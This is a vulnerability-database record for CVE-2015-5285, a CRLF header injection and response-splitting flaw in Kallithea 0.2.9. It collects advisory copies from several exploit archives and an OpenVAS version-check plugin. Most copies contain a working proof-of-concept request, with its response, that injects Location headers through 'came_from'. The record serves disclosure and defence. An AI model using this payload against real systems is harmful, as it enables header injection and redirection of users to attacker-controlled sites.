ID CVE-2015-5285 Type cve Reporter NVD Modified 2015-10-30T16:00:12
Description
CRLF injection vulnerability in Kallithea before 0.3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the came_from parameter to _admin/login.
{"packetstorm": [{"lastseen": "2016-12-05T22:21:20", "references": [], "edition": 1, "description": "", "reporter": "LiquidWorm", "published": "2015-10-08T00:00:00", "type": "packetstorm", "title": "Kallithea 0.2.9 HTTP Response Splitting", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5285"], "modified": "2015-10-08T00:00:00", "href": "https://packetstormsecurity.com/files/133897/Kallithea-0.2.9-HTTP-Response-Splitting.html", "id": "PACKETSTORM:133897", "sourceData": "`\ufeff \nKallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability \n \n \nVendor: Kallithea \nProduct web page: https://www.kallithea-scm.org \nVersion affected: 0.2.9 and 0.2.2 \n \nSummary: Kallithea, a member project of Software Freedom Conservancy, \nis a GPLv3'd, Free Software source code management system that supports \ntwo leading version control systems, Mercurial and Git, and has a web \ninterface that is easy to use for users and admins. \n \nDesc: Kallithea suffers from a HTTP header injection (response splitting) \nvulnerability because it fails to properly sanitize user input before \nusing it as an HTTP header value via the GET 'came_from' parameter in \nthe login instance. This type of attack not only allows a malicious \nuser to control the remaining headers and body of the response the \napplication intends to send, but also allow them to create additional \nresponses entirely under their control. \n \nTested on: Kali \nPython \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2015-5267 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php \nVendor: https://kallithea-scm.org/news/release-0.3.html \nVendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html \nCVE ID: 2015-5285 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285 \n \n \n21.09.2015 \n \n-- \n \n \nGET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1 \nHost: 192.168.0.28:8080 \nContent-Length: 0 \nCache-Control: max-age=0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nOrigin: http://192.168.0.28:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 \nContent-Type: application/x-www-form-urlencoded \nReferer: http://192.168.0.28:8080/_admin/login?came_from=%2F \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.8 \nCookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438 \n \n### \n \nHTTP/1.1 302 Found \nCache-Control: no-cache \nContent-Length: 411 \nContent-Type: text/html; charset=UTF-8 \nDate: Mon, 21 Sep 2015 13:58:05 GMT \nLocation: http://192.168.0.28:8080/_admin/d47b5 \nX-Forwarded-Host: http://zeroscience.mk \nLocation: http://zeroscience.mk \nPragma: no-cache \nServer: waitress \n \n<html> \n<head> \n<title>302 Found</title> \n</head> \n<body> \n<h1>302 Found</h1> \nThe resource was found at <a href=\"http://192.168.0.28:8080/_admin/d47b5 \nX-Forwarded-Host: http://zeroscience.mk \nLocation: http://zeroscience.mk\">http://192.168.0.28:8080/_admin/d47b5 \nX-Forwarded-Host: http://zeroscience.mk \nLocation: http://zeroscience.mk</a>; \nyou should be redirected automatically. \n \n \n</body> \n</html> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133897/ZSL-2015-5267.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-10-22T16:39:31", "references": ["https://kallithea-scm.org", "https://packetstormsecurity.com/files/133897", "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php"], "pluginID": "1361412562310806613", "description": "The host is installed with Kallithea and\n is prone to http response splitting vulnerability.", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-11-06T00:00:00", "title": "Kallithea 'came_from' parameter HTTP Response Splitting Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5285"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310806613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806613", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_kallithea_http_response_splitting_vuln.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Kallithea 'came_from' parameter HTTP Response Splitting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:kallithea:kallithea\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806613\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5285\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-06 12:57:52 +0530 (Fri, 06 Nov 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Kallithea 'came_from' parameter HTTP Response Splitting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Kallithea and\n is prone to http response splitting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists as the application fails to\n properly sanitize user input before using it as an HTTP header value via the GET\n 'came_from' parameter in the login instance.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct http response splitting attacks.\");\n\n script_tag(name:\"affected\", value:\"Kallithea version 0.2.9 and 0.2.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Kallithea version 0.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/133897\");\n script_xref(name:\"URL\", value:\"http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_kallithea_detect.nasl\");\n script_mandatory_keys(\"Kallithea/Installed\");\n script_require_ports(\"Services/www\", 5000);\n script_xref(name:\"URL\", value:\"https://kallithea-scm.org\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!kalPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!kalVer = get_app_version(cpe:CPE, port:kalPort)){\n exit(0);\n}\n\n\nif(version_is_equal( version:kalVer, test_version:\"0.2.9\")||\n version_is_equal( version:kalVer, test_version:\"0.2.2\"))\n{\n report = 'Installed Version: ' + kalVer + '\\nFixed Version: 0.3\\n';\n security_message(port:kalPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-02-06T07:12:04", "references": [], "description": "Kallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. Versions 0.2.9 and 0.2.2 are affected.", "edition": 2, "reporter": "LiquidWorm", "published": "2015-10-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Kallithea 0.2.9 HTTP Response Splitting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5285"], "modified": "2015-10-08T00:00:00", "id": "1337DAY-ID-24384", "href": "https://0day.today/exploit/description/24384", "sourceData": "Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability\r\n\r\n\r\nVendor: Kallithea\r\nProduct web page: https://www.kallithea-scm.org\r\nVersion affected: 0.2.9 and 0.2.2\r\n\r\nSummary: Kallithea, a member project of Software Freedom Conservancy,\r\nis a GPLv3'd, Free Software source code management system that supports\r\ntwo leading version control systems, Mercurial and Git, and has a web\r\ninterface that is easy to use for users and admins.\r\n\r\nDesc: Kallithea suffers from a HTTP header injection (response splitting)\r\nvulnerability because it fails to properly sanitize user input before\r\nusing it as an HTTP header value via the GET 'came_from' parameter in\r\nthe login instance. This type of attack not only allows a malicious\r\nuser to control the remaining headers and body of the response the\r\napplication intends to send, but also allow them to create additional\r\nresponses entirely under their control.\r\n\r\nTested on: Kali\r\n Python\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5267\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php\r\nVendor: https://kallithea-scm.org/news/release-0.3.html\r\nVendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html\r\nCVE ID: 2015-5285\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285\r\n\r\n\r\n21.09.2015\r\n\r\n--\r\n\r\n\r\nGET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1\r\nHost: 192.168.0.28:8080\r\nContent-Length: 0\r\nCache-Control: max-age=0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://192.168.0.28:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://192.168.0.28:8080/_admin/login?came_from=%2F\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438\r\n\r\n###\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: no-cache\r\nContent-Length: 411\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Mon, 21 Sep 2015 13:58:05 GMT\r\nLocation: http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\r\nPragma: no-cache\r\nServer: waitress\r\n\r\n<html>\r\n <head>\r\n <title>302 Found</title>\r\n </head>\r\n <body>\r\n <h1>302 Found</h1>\r\n The resource was found at <a href=\"http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\">http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001</a>;\r\nyou should be redirected automatically.\r\n\r\n\r\n </body>\r\n</html>\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/24384"}], "zeroscience": [{"lastseen": "2018-08-31T00:36:04", "references": [], "description": "Title: Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability \nAdvisory ID: [ZSL-2015-5267](<ZSL-2015-5267.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 07.10.2015 \n\n\n##### Summary\n\nKallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins. \n\n##### Description\n\nKallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. \n\n##### Vendor\n\nKallithea - <https://www.kallithea-scm.org>\n\n##### Affected Version\n\n0.2.9 and 0.2.2 \n\n##### Tested On\n\nKali \nPython \n\n##### Vendor Status\n\n[21.09.2015] Vulnerability discovered. \n[22.09.2015] Vendor contacted. \n[22.09.2015] Vendor responds asking more details. \n[23.09.2015] Sent details to the vendor. \n[23.09.2015] Vendor confirms the issue planing to fix in version 0.3. \n[24.09.2015] Working with the vendor. \n[24.09.2015] CVE-2015-5285 assigned. \n[02.10.2015] Vendor releases version 0.3 to address this issue. \n[07.10.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[kallithea_http.txt](<../../codes/kallithea_http.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)> \nHigh five to Mads and Andrew! \n\n##### References\n\n[1] <https://kallithea-scm.org/news/release-0.3.html> \n[2] <https://kallithea-scm.org/security/cve-2015-5285.html> \n[3] <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068> \n[4] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285> \n[5] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5285> \n[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/106915> \n[7] <https://cxsecurity.com/issue/WLB-2015100066> \n[8] <https://packetstormsecurity.com/files/133897/Kallithea-0.2.9-HTTP-Response-Splitting.html> \n[9] <https://www.exploit-db.com/exploits/38424/>\n\n##### Changelog\n\n[07.10.2015] - Initial release \n[11.10.2015] - Added reference [6], [7] and [8] \n[12.10.2015] - Added reference [9] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 3, "reporter": "Gjoko Krstic", "published": "2015-10-07T00:00:00", "title": "Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability", "type": "zeroscience", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5285"], "modified": "2015-10-07T00:00:00", "id": "ZSL-2015-5267", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php", "sourceData": "\u00ef\u00bb\u00bf\r\nKallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability\r\n\r\n\r\nVendor: Kallithea\r\nProduct web page: https://www.kallithea-scm.org\r\nVersion affected: 0.2.9 and 0.2.2\r\n\r\nSummary: Kallithea, a member project of Software Freedom Conservancy,\r\nis a GPLv3'd, Free Software source code management system that supports\r\ntwo leading version control systems, Mercurial and Git, and has a web\r\ninterface that is easy to use for users and admins.\r\n\r\nDesc: Kallithea suffers from a HTTP header injection (response splitting)\r\nvulnerability because it fails to properly sanitize user input before\r\nusing it as an HTTP header value via the GET 'came_from' parameter in\r\nthe login instance. This type of attack not only allows a malicious\r\nuser to control the remaining headers and body of the response the\r\napplication intends to send, but also allow them to create additional\r\nresponses entirely under their control.\r\n\r\nTested on: Kali\r\n Python\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5267\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php\r\nVendor: https://kallithea-scm.org/news/release-0.3.html\r\nVendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html\r\nCVE ID: 2015-5285\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285\r\n\r\n\r\n21.09.2015\r\n\r\n--\r\n\r\n\r\nGET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1\r\nHost: 192.168.0.28:8080\r\nContent-Length: 0\r\nCache-Control: max-age=0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://192.168.0.28:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://192.168.0.28:8080/_admin/login?came_from=%2F\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438\r\n\r\n###\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: no-cache\r\nContent-Length: 411\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Mon, 21 Sep 2015 13:58:05 GMT\r\nLocation: http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\r\nPragma: no-cache\r\nServer: waitress\r\n\r\n<html>\r\n <head>\r\n <title>302 Found</title>\r\n </head>\r\n <body>\r\n <h1>302 Found</h1>\r\n The resource was found at <a href=\"http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\">http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001</a>;\r\nyou should be redirected automatically.\r\n\r\n\r\n </body>\r\n</html>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/kallithea_http.txt"}], "exploitdb": [{"lastseen": "2016-02-04T08:03:48", "osvdbidlist": [], "references": [], "edition": 1, "description": "Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability. Webapps exploits for multiple platform", "reporter": "LiquidWorm", "published": "2015-10-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Kallithea 0.2.9 came_from HTTP Response Splitting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5285"], "modified": "2015-10-08T00:00:00", "id": "EDB-ID:38424", "href": "https://www.exploit-db.com/exploits/38424/", "sourceData": "\r\nKallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability\r\n\r\n\r\nVendor: Kallithea\r\nProduct web page: https://www.kallithea-scm.org\r\nVersion affected: 0.2.9 and 0.2.2\r\n\r\nSummary: Kallithea, a member project of Software Freedom Conservancy,\r\nis a GPLv3'd, Free Software source code management system that supports\r\ntwo leading version control systems, Mercurial and Git, and has a web\r\ninterface that is easy to use for users and admins.\r\n\r\nDesc: Kallithea suffers from a HTTP header injection (response splitting)\r\nvulnerability because it fails to properly sanitize user input before\r\nusing it as an HTTP header value via the GET 'came_from' parameter in\r\nthe login instance. This type of attack not only allows a malicious\r\nuser to control the remaining headers and body of the response the\r\napplication intends to send, but also allow them to create additional\r\nresponses entirely under their control.\r\n\r\nTested on: Kali\r\n Python\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5267\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php\r\nVendor: https://kallithea-scm.org/news/release-0.3.html\r\nVendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html\r\nCVE ID: 2015-5285\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285\r\n\r\n\r\n21.09.2015\r\n\r\n--\r\n\r\n\r\nGET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1\r\nHost: 192.168.0.28:8080\r\nContent-Length: 0\r\nCache-Control: max-age=0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://192.168.0.28:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://192.168.0.28:8080/_admin/login?came_from=%2F\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438\r\n\r\n###\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: no-cache\r\nContent-Length: 411\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Mon, 21 Sep 2015 13:58:05 GMT\r\nLocation: http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\r\nPragma: no-cache\r\nServer: waitress\r\n\r\n<html>\r\n <head>\r\n <title>302 Found</title>\r\n </head>\r\n <body>\r\n <h1>302 Found</h1>\r\n The resource was found at <a href=\"http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001\">http://192.168.0.28:8080/_admin/d47b5\r\nX-Forwarded-Host: http://zeroscience.mk\r\nLocation: http://zeroscience.mk\u0001</a>;\r\nyou should be redirected automatically.\r\n\r\n\r\n </body>\r\n</html>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38424/"}]}
